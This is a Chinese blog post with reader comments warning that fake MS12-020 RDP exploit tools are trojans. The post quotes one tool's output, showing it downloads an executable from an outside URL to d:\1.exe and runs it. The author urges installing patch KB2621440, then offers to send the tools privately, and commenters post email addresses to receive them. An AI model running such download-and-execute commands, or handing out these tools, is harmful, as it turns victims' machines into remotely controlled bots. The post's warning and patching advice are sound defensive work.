这几天都在关注着MS12-020的漏洞,就连不知道这是什么东西的人也来试一把,就像是在赶新潮,但是要小心了,这种好奇心可能也会使你成为别人的肉鸡,已经有几个朋友中招了。
先看一下他们的运行结果:
Usage : MS12-020 [IP] [Command]
MS12-020 EXP : Parameter error. on port 3389…
MS12-020 EXP : Connecting to on port 3389…
MS12-020 EXP : Connecting to on port 3389…
MS12-020 EXP : Connecting to on port 3389…
MS12-020 EXP : Connecting to
MS12-020 EXP : Command succeed !
MS12-020 EXP : Have a good time. d:\1.exe http://lib.gxufe.cn/data/calc.exe d:\1.exe ios_base::eofbit set ios_base::failbit set
很显然了,它将在网上下载一个文件来执行!!!!上面的打印信息是伪装的,很容易就制作出来了。
作为一个负责人的黑客,是不会轻易的将这么严重漏洞攻击的EXP工具放出来的,要知道这将引起多大的风波?!可以说,现在依然有很多服务器处在0day下!赶紧打KB2621440 的补丁吧!!!http://url.cn/4SH6Q7
现在网上流行的python和ruby的测试Proc也仅仅是对内存片的操作,并不会远程执行其他的代码,造成机器蓝屏、重启。
最后提醒一下,在下载运行这些东西之前,还是要小心+小心啊!
这些东西就不在这里发布了,想要的可以在楼下留言。
这么高深。做了几年MS家的应用开发,我已经什么都不懂了。
呵呵。。回来了吗?
还没,月底就回
jinseok123@gmail.com Thank you~
来看看,好象很强大的
有EXE的吗?
gogodayday123@gmail.com 😮 谢谢
2458754109@qq.com 感谢博主!
已经发送,请查收。
weizhunsun@163.com ,谢谢
这是我的空间 http://hi.baidu.com/%E9%9B%AA%E8%B0%B7%E6%9C%88%E5%A4%9C/home
msaabc@gmail.com 谢谢